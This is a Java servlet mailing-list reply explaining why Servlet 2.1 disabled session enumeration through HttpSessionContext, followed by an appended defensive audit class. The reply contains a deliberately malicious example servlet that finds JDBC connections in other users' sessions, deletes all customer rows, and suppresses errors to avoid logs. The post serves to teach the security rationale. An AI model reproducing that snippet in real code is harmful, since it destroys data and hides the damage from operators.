"Jain, Hursh" wrote:

> Yeah, but why is this a security issue ? Servlets are server side so aren't
> you in control over all the code ? And suppose you do decide to use a
> third party servlet. Wouldn't you get that servlet from a reputable company ?
> Or maybe get source along with the servlet ?
>
> I mean this is not like applets where any code could run in your browser. In
> servlets, you carefully control the code that runs in your environment.
>
> I don't have experience with HttpSessionContext, so if this is a naive
> question, my apologies...
>
> Best regards,
>
> --Hursh

Do you ever run any third party code that you've either purchased or acquired?
Do you check the source code thoroughly even if it is available?  (What
percentage of Linux users have ever looked at a single line of the OS source
code, even though it's right there on the distribution CD?)

Consider what happens to your database if a third party servlet you happen to
use has some code like this contrived example, triggered by some event that is
not obvious (this code was legal under the 2.0 API -- under the 2.1 API it will
compile but not damage you at runtime):

    HttpSession session = request.getSession(true);
    HttpSessionContext sessContext = session.getSessionContext();
    Enumeration ids = sessContext.getIds();    // All the active session IDs
    while (ids.hasMoreElements()) {
        String id = (String) ids.nextElement();    // Next session ID
        HttpSession sess = sessContext.getSession(id);    // Get that session
        String names[] = sess.getValueNames();    // Every attribute stored in it
        for (int i = 0; i < names.length; i++) {
            Object value = sess.getValue(names[i]);
            if (value instanceof java.sql.Connection) {
                try {    // If this is a JDBC connection, try to do something nasty
                    java.sql.Connection conn = (java.sql.Connection) value;
                    java.sql.Statement stmt = conn.createStatement();
                    stmt.executeUpdate("delete from customers");
                    stmt.close();
                } catch (java.sql.SQLException e) {
                    ;    // Swallow errors so nothing shows up in the logs
                }
            }
        }
    }

If you happen to have a table called customers, it no longer has any rows in
it.  A more realistic malicious program could use the JDBC "meta data"
facilities to find the names of all accessible tables and delete all the rows in
all of them -- roughly the database equivalent of running "rm -rf *" at the
top-level directory of a Unix system when logged on as root.

This would be just as fertile a ground for viruses as the Microsoft Office
macros that allowed Melissa and all of its clones.  Removing the ability to list
all the active sessions protects you from this, even in third party code.

Craig McClanahan
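As an added illustration (not part of Craig's message or of any servlet container's code) of why the 2.1 change makes the loop above harmless: Servlet 2.1 deprecates HttpSessionContext and requires getIds() to return an empty Enumeration and getSession(id) to return null. The class below implements that contract, and its audit method walks sessions exactly the way the malicious servlet does but only counts the JDBC connections it can reach. It assumes a javax.servlet API jar (2.1 through 5.x, before the Jakarta rename) on the classpath; the class and method names are my own.

```java
import java.util.Collections;
import java.util.Enumeration;
import javax.servlet.http.HttpSession;
import javax.servlet.http.HttpSessionContext;

/**
 * Hypothetical implementation of the Servlet 2.1 contract for the deprecated
 * HttpSessionContext: no session IDs are ever enumerated and no session can be
 * looked up by ID, so code in one servlet cannot reach another user's session.
 */
public class InertSessionContext implements HttpSessionContext {

    /** Servlet 2.1: getIds() must return an empty Enumeration. */
    public Enumeration<String> getIds() {
        return Collections.<String>emptyEnumeration();
    }

    /** Servlet 2.1: getSession() must return null, whatever the ID. */
    public HttpSession getSession(String sessionId) {
        return null;
    }

    /**
     * Defensive audit that walks sessions the same way the malicious loop does,
     * but only counts JDBC Connection objects instead of using them. A non-zero
     * result means raw connections are stored in sessions that other code on
     * the same container can enumerate (i.e. a pre-2.1 container).
     */
    public static int countReachableConnections(HttpSessionContext ctx) {
        int reachable = 0;
        Enumeration<String> ids = ctx.getIds();
        while (ids.hasMoreElements()) {
            HttpSession sess = ctx.getSession(ids.nextElement());
            if (sess == null) {
                continue;   // 2.1+ containers always answer null here
            }
            String[] names = sess.getValueNames();
            for (int i = 0; i < names.length; i++) {
                if (sess.getValue(names[i]) instanceof java.sql.Connection) {
                    reachable++;
                }
            }
        }
        return reachable;
    }

    public static void main(String[] args) {
        int n = countReachableConnections(new InertSessionContext());
        System.out.println("JDBC connections reachable via session listing: " + n);
    }
}
```

Against the inert context the audit reports 0, which is exactly why the delete-from-customers code compiles under 2.1 but never executes its loop body.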


Archives: http://archives.java.sun.com/archives/servlet-interest.html
Resources: http://java.sun.com/products/servlet/external-resources.html